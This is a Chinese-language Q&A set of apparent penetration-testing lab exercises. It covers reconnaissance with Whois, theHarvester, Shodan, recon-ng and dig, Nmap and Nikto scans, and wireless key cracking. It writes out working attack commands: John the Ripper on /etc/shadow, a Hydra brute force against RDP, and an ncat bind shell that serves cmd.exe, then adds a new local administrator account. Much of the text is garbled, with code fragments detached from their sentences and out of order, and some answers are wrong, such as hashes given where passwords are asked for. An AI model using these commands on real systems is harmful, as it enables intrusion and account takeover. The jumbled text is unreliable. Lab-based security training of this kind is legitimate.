1、使用 www.arin.net/whois 来发现组织的信息。步骤如下:1. 访问 www.arin.net/whois。2. 在 ARIN Whois/RDAP 搜索栏中输入 Microsoft,在 Whois 数据库中搜索微软。3. 浏览实体搜索结果。4. 选择句柄“MICRO – 218”的链接。5. 浏览结果。6. 对自己所在的组织进行同样类型的 Whois 搜索,以确定公司可能拥有的公共 IP 块。如果没有找到任何结果,尝试其他 Whois 数据库搜索网站。请描述该操作流程。
该流程指导通过特定步骤使用 www.arin.net/whois 查找微软信息,进而对自身组织进行同样的 Whois 搜索以确定公共 IP 块。若无果,可尝试其他 Whois 数据库搜索网站。
具体步骤为:
先访问该网站。 搜索“微软”。 浏览结果并选择特定句柄链接。 再浏览新结果。 对自身组织进行相同操作。
2、使用 theHarvester 收集你所在组织的电子邮件地址和主机 IP 地址。步骤:1. 在你的 Kali Linux 系统中启动终端会话。2. 使用以下命令,用 theHarvester 收集 wiley.com 公共系统的电子邮件地址和 IP 地址:theharvester -d wiley.com -b all。3. 现在使用 theHarvester 收集你所在组织的电子邮件地址和 IP 地址。
首先在 Kali Linux 系统中启动终端会话,接着执行命令:
```bash
theharvester -d wiley.com -b all
收集
公共系统的电子邮件地址和 IP 地址。之后,把命令中的
wiley.com
替换为你所在组织的域名,再次执行类似命令来收集你所在组织的电子邮件地址和 IP 地址。
wiley.com
##3、使用shodan.io为你的组织发现互联网上的系统以及有关这些系统的信息,请简述操作步骤。
### 使用Shodan发现组织互联网系统及相关信息的操作流程
1. **访问网站并注册登录**
打开Shodan网站,进行注册并登录账户。
2. **搜索公司**
在搜索框中输入公司名称或相关关键词,查找目标组织的互联网系统。
3. **浏览结果**
查看搜索结果页面,识别与目标组织相关的系统信息。
4. **查看系统物理位置**
在结果中选择具体的系统条目,查看其地理位置信息。
5. **选择系统查看详情**
点击感兴趣的系统,进入详情页面,获取更全面的信息,如开放端口、服务类型等。
6. **返回主结果**
完成详细查看后,返回主搜索结果页面以进行进一步分析或操作。
##4、在Kali Linux上使用recon - ng进行开源情报(OSINT)信息收集。步骤如下:1. 启动recon - ng并添加工作区。2. 在recon - ng中,为想要收集信息的公司配置域名和公司名称。3. 检索Whois联系人信息。4. 从Bing和Google检索相关域名和主机列表。5. 生成一个HTML报告来查看收集到的数据。
以下是具体操作步骤:
1. 启动recon-ng并添加工作区:
```
recon - ng
workspaces add wiley
```
2. 添加域名和公司名称到recon-ng数据库表:
```
add domains wiley.com
add domains www.wiley.com
add domains dummies.com
add domains www.dummies.com
add companies Wiley~A publishing company
add companies Wiley Publishing~A publishing company
add companies ForDummies~A Wiley product line
```
3. 检索Whois联系人信息:
```
use recon/domains-contacts/whois_pocs
run
```
4. 从Bing和Google检索相关域名和主机列表:
```
use recon/domains-hosts/bing_domain_web
run
use recon/domains-hosts/google_site_web
run
```
5. 生成HTML报告:
```
use reporting/html
set CREATOR 'Glen E. Clarke'
set CUSTOMER 'Wiley Publishing'
set FILENAME /root/Desktop/Wiley_recon.html
run
```
最后,你可以通过双击桌面上的HTML文件查看报告。
##5、使用dig工具对所在组织进行DNS分析,请写出具体步骤。
按照以下步骤使用 `dig` 进行组织的 DNS 分析:
1. 打开 Kali Linux 系统的终端;
2. 运行 `dig www.domain_name.com +short` 确定系统 IP 地址;
3. 运行 `dig domain_name.com NS +short` 确定公司 DNS 服务器;
4. 运行 `dig domain_name.com MX +short` 确定公司电子邮件服务器。
##6、使用 Nmap 对网络进行端口扫描,具体步骤如下:1. 在 Kali Linux 系统上,启动一个新的终端。2. 对网络进行 SYN 扫描。3. 通过版本扫描识别端口上运行的软件版本。4. 对特定系统进行 SYN 扫描,并识别该系统上运行的操作系统。
以下是具体操作步骤:
1. 打开 Kali Linux 系统,启动一个新的终端。
2. 进行 SYN 扫描一般使用 `nmap -sS 网络地址` 的命令来对网络进行 SYN 扫描。
3. 进行版本扫描以识别端口上运行的软件版本,使用 `-sV` 开关,命令如 `nmap -sV 网络地址`。
4. 对特定系统进行 SYN 扫描并识别其操作系统,使用 `-O` 开关,命令如 `nmap -sS -O 特定系统 IP 地址`。
注意要在实验室环境中运行这些命令,因为在生产网络上运行可能会触发入侵检测系统。
##7、若存在MS17 - 010关键漏洞,可以使用什么工具来利用此漏洞?请在此处填写该工具:_____________________________
Metasploit
##8、练习4 - 3:输入ifconfig命令分别记录Metasploitable2和Kali Linux的IP地址
需分别记录 `Metasploitable2` 和 `Kali Linux` 的 IP 地址,即:
1. 先记录 `Metasploitable2` 的 IP 地址
2. 再记录 `Kali Linux` 的 IP 地址
##9、练习6 - 1:破解WEP加密。要进行此练习,你需要一个测试实验室环境,其中包含一个设置了WEP加密的接入点、一个连接到该接入点的无线客户端,以及一个配备支持的无线网卡的Kali Linux系统。1. 将路由器配置为WEP加密,并将客户端连接到无线网络,以验证客户端可以上网。2. 使用Kali Linux系统,按照操作指南中的步骤,查看是否可以破解WEP密钥。
此练习的操作步骤为:
1. 首先准备好测试实验室环境,包括设置了WEP加密的接入点、连接到该接入点的无线客户端以及配备支持的无线网卡的Kali Linux系统。
2. 接着将路由器配置为WEP加密,连接客户端到无线网络并验证其能上网。
3. 最后使用Kali Linux系统,按操作指南步骤尝试破解WEP密钥。
##10、练习6 - 2:破解WPS PIN。在本练习中,你需要搭建一个实验环境,其中包括一个配置为WPA加密且支持WPS的无线路由器、一个无线客户端,以及安装有支持的无线网卡的Kali Linux系统。步骤如下:1. 将路由器配置为WPA,并将客户端连接到无线网络,以验证客户端可以上网。2. 使用Kali Linux系统,按照“破解WPS实现漏洞”的操作步骤进行操作,看是否能破解WPS PIN。
该练习要求搭建特定实验环境,先将路由器配置为WPA并让客户端联网验证,再用Kali Linux系统按“破解WPS实现漏洞”步骤尝试破解WPS PIN。
##11、练习6 - 3:破解WPA/WPA2加密密钥。在这个练习中,你需要搭建一个实验室环境,其中包括一个配置为WPA2的无线路由器、一个无线客户端,以及一台装有支持的无线网卡的Kali Linux系统的设备。步骤如下:1. 将路由器配置为WPA2,并将客户端连接到无线网络,验证客户端可以正常上网。2. 使用Kali Linux系统,按照“破解WPA/WAP2加密密钥”的操作步骤,尝试破解WPA2加密密钥。
在该练习里,需搭建含配置 WPA2 的无线路由器、无线客户端和带支持网卡的 Kali Linux 系统的实验室环境。
1. 先把路由器设为 WPA2,连接客户端上网验证;
2. 再用 Kali Linux 系统按“破解 WPA/WPA2 加密密钥”步骤尝试破解密钥。
##12、练习6 - 4:测试蓝牙设备。你需要在一个配备支持蓝牙的智能手机的实验室环境中,使用一台带有支持蓝牙的网卡的Kali Linux系统。请按照相关步骤,查看是否能够发现蓝牙设备并从该设备中检索数据。
### 蓝牙设备发现与数据检索练习
要完成此练习,需在有蓝牙智能手机的实验室环境中,使用带有支持蓝牙网卡的Kali Linux系统,按相关步骤操作,以发现蓝牙设备并检索数据。
#### 操作准备
- 确保Kali Linux系统配备有支持蓝牙的适配器。
- 验证蓝牙适配器状态,可通过运行以下命令实现:
```
hciconfig
```
- 如果蓝牙接口未启用,可使用以下命令启用(假设接口ID为 `hci0`):
```
hciconfig hci0 up
```
#### 辅助工具
- 可使用如下工具辅助评估蓝牙设备:
- **Bluelog**
- **Blueranger**
##13、输入 ifconfig 命令查看 Kali Linux 的 IP 地址,并将其记录在此处:Kali Linux IP 地址:__________________
需在 Kali Linux 系统中运行 ifconfig 命令后获取实际 IP 地址填写
##14、在此记录每个账户的密码:管理员:___________________ 戈登·B:___________________ 1337:___________________ 巴勃罗:___________________ 史密斯:___________________
```markdown
管理员: 5f4dcc3b5aa765d61d8327deb882cf99
戈登·B: e99a18c428cb38d5f260853678922e03
1337: 8d3533d75ae2c3966d7e0d4fcc69216b
巴勃罗: 0d107d09f5bbe40cade3de5c71e9e9b7
史密斯: 5f4dcc3b5aa765d61d8327deb882cf99
15、在Kali Linux系统上使用John the Ripper破解Linux用户账户的密码哈希,给出操作步骤。
在Kali Linux系统上打开终端。 使用以下命令创建几个用户账户:
使用以下命令为用户账户设置密码:
bash useradd labUser useradd labUser2
– 为
设置密码:
labUser
bash passwd labUser
输入密码
并确认。
house
– 为
设置密码:
labUser2
bash passwd labUser2
输入密码
并确认。 通过键入以下命令查看Linux系统上的密码哈希:
kids
bash cat /etc/shadow
查找带有密码哈希的新用户账户。 要破解密码哈希,键入以下命令:
bash john /etc/shadow
16、使用Nmap在网络上定位可以扫描漏洞的Web服务器,操作步骤是什么?
操作步骤:利用Nmap定位可扫描漏洞的Web服务器
该操作步骤可有效利用 Nmap 在网络中定位可扫描漏洞的 Web 服务器。
步骤说明
打开终端
在 Kali Linux 系统中打开终端。
执行扫描命令
使用示例命令进行扫描(可根据实际网络修改 IP 范围)。
记录结果
最后记录端口 80 开放的系统 IP 地址。
结果说明
这些记录的 IP 地址对应的系统即为定位到的 Web 服务器。
17、使用Nikto扫描Web服务器的安全漏洞,操作步骤如下:1. 使用Kali Linux系统,启动终端会话。2. 使用Nikto对每个Web服务器执行Web应用程序漏洞扫描:nikto -h 192.168.2.2。3. 查看结果。判断该操作步骤是否可行,并说明理由。
该操作步骤可行。Nikto 是 Kali Linux 自带的命令行工具,可用于评估渗透测试范围内不同网站的安全性。
使用以下命令可对 IP 为
的 Web 服务器进行漏洞扫描:
192.168.2.2
nikto -h 192.168.2.2
扫描完成后查看结果即可了解该服务器的安全状况。
18、使用Hydra对目标Windows机器进行密码破解,在Windows系统上,确保启用远程桌面。请列出操作步骤。
在Windows系统上,启用远程桌面。
在Windows系统上,创建一个名为
的新用户账户,密码为
lab9user
。
house
在Kali Linux系统上,创建一个名为
的文本文件,包含以下密码列表:
passlist.txt
–
password
–
testpass
–
toor
–
pa$$word
–
house
–
kids
并将其保存到根文件夹。
在Kali Linux的终端中,键入以下命令,尝试使用RDP破解密码:
bash hydra -t 4 -l lab9user -P passlist.txt -V rdp://ip_of_windows
滚动查看结果。
19、使用CeWL爬取网站并从网站内容创建单词列表文件的操作步骤是什么
在Kali Linux系统上打开终端。 使用命令
爬取网站并从其内容构建单词列表。 使用命令
cewl -d 3 -m 5 -w crawledwords.txt http://ip_of_site
显示单词列表文件的内容。
cat crawledwords.txt
20、使用Netcat(nc和Ncat)在目标系统上创建一个绑定shell,以便随时远程访问的操作步骤。
在目标Windows系统上,下载最新的Windows版本的Nmap,因为它现在包含
。 下载完成后,进入命令提示符并键入以下命令:
ncat.exe
Cd Cd program files(x86)
map
运行
命令,应看到
dir
程序。 要将Windows系统设置为在端口5555上监听并发送shell,请运行以下命令:
ncat.exe
ncat -n -v -l -p 5555 -e cmd.exe
此时Windows机器处于监听模式,切换到Kali Linux系统并启动终端。
在终端中键入以下内容,以连接到Windows目标的端口5555并获得命令shell:
nc -n -v ip_of_windows 5555
连接到Windows系统后,可运行Windows命令。
运行以下命令:
(1) 显示登录的用户:
whoami
(2) 创建名为
的用户:
shelluser
net user shelluser Pa$$w0rd /add
(3) 将该用户添加到本地管理员组(假设以管理员账户登录):
net localgroup administrators shelluser /add
(4) 显示用户列表以验证新用户是否已创建:
net user
21、查看以下代码并回答后续问题。代码为:computers=(‘computer1’ ‘computer2’); for comp in “${computers[@]}”; do echo ‘==========================================’; echo “Scanning $comp”; echo ‘==========================================’; for port in {80,3389}; do echo ‘’ > /dev/tcp/$host/$port && echo “Port $port is open”; done 2>/dev/null; done。该脚本使用了什么语言编写?
Bash脚本语言
22、回顾以下代码并回答后续问题。代码为数组包含’computer1’和’computer2’,通过循环遍历数组中的每台计算机,对每台计算机扫描80和3389端口,若端口开放则输出相应信息。请问该脚本的作用是什么?
该脚本会依次扫描
和
computer1
这两台计算机的 80 和 3389 端口,若端口开放则输出相应提示信息。
computer2
23、在 Linux 系统上,将脚本输入到文本文件中,然后执行该脚本。确保将脚本中计算机名称更改为实验室环境中使用的计算机名称。
操作说明
先在文本文件中输入脚本内容。 将脚本中的计算机名称替换为实验室环境中实际使用的名称。 执行脚本前,确保文件具有执行权限:
– 可使用以下命令赋予权限:
使用以下命令执行脚本:
chmod 755 文件名.sh
./文件名.sh
24、审查以下代码,判断这段脚本使用了什么语言编写。代码如下:# 此部分导入要使用的代码库 import socket import subprocess import sys from datetime import datetime # 这行代码清空屏幕 subprocess.call(‘clear’, shell=True) remoteSystem = raw_input(“Enter a FQDN to scan: “) remoteSystemIP = socket.gethostbyname(remoteSystem) print “—————————————————” print “Please wait, scanning IP address:”, remoteSystemIP print “—————————————————” startTime = datetime.now() try: for port in range(1,1024): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((remoteSystemIP, port)) if result == 0: print “Port {}: Open”.format(port) sock.close() except socket.error: print “Failure connecting to system” sys.exit() endTime = datetime.now() difftime = endTime – startTime print ‘Time to complete operation: ‘, difftime
Python
25、查看一段代码,代码中有使用 # 开头部分进行代码库导入操作,导入了 socket、subprocess、sys 以及从 datetime 导入了 datetime。接着有清除屏幕的操作,通过 raw_input 获取用户输入的 FQDN 并获取其 IP 地址,打印相关提示信息,记录开始时间,尝试对 1 到 1023 端口进行扫描,若端口开放则打印信息,若出现 socket 错误则输出连接失败信息并退出程序,最后记录结束时间并计算操作耗时。问如何判断这段代码使用的是什么语言?
代码中使用了
语句导入模块,
import
函数获取用户输入,
raw_input
语句输出信息,以及
print
循环和
for
异常处理结构,这些都是 Python 语言的典型特征,所以可以判断使用的语言是 Python。
try-except
26、审查以下代码并回答后续问题。代码功能是先导入所需库,清屏,提示用户输入要扫描的完全限定域名(FQDN)并获取其 IP 地址,然后从 1 到 1023 端口进行扫描,若端口开放则输出信息,记录扫描开始和结束时间并计算耗时。该脚本的作用是什么?
该脚本用于扫描用户输入的完全限定域名(FQDN)对应的 IP 地址的 1 到 1023 端口,找出开放的端口,并记录扫描操作的耗时。
27、在安装了 Python 的系统上,将脚本输入到文本文件中,然后执行该脚本,具体该怎么做?
以下是具体步骤:
使用文本编辑器编写 Python 脚本,如
。 将编写好的脚本保存为
print('Hello, World!')
扩展名的文件,如
.py
。 打开终端或命令提示符,进入保存脚本文件的目录。 执行命令
test.py
来运行脚本(若为 Python 3,可能需要使用
python test.py
)。
python3 test.py
28、审查以下代码并回答后续问题。代码为:$creds = get – credential – Message “Enter username and password of an admin account.” $comp = read – host “Enter computername” write – host “User accounts on: $comp” – ForegroundColor Cyan Get – WmiObject win32_userAccount – ComputerName $comp | format – table name, @{n=’Computername’;e={$_.domain}},caption write – host “Operating System Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_operatingsystem – ComputerName $comp | format – list CSName,Caption,OSArchitecture,ServicePackMajorVersion write – host “Computer Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_computersystem – ComputerName $comp | format – list Caption,Domain,Manufacturer,SystemFamily。该脚本使用什么语言编写?
PowerShell
29、查看以下代码,判断使用的是什么语言。代码如下:$creds = get – credential – Message “Enter username and password of an admin account.” $comp = read – host “Enter computername” write – host “User accounts on: $comp” – ForegroundColor Cyan Get – WmiObject win32_userAccount – ComputerName $comp | format – table name, @{n=’Computername’;e={$_.domain}},caption write – host “Operating System Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_operatingsystem – ComputerName $comp | format – list CSName,Caption,OSArchitecture,ServicePackMajorVersion write – host “Computer Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_computersystem – ComputerName $comp | format – list Caption,Domain,Manufacturer,SystemFamily。
代码中使用了 PowerShell 特有的命令和语法,如
、
get-credential
、
read-host
、
write-host
等,还有变量以
Get-WmiObject
开头,管道符
$
的使用方式也符合 PowerShell 的特点,因此可判断使用的是 PowerShell 语言。
|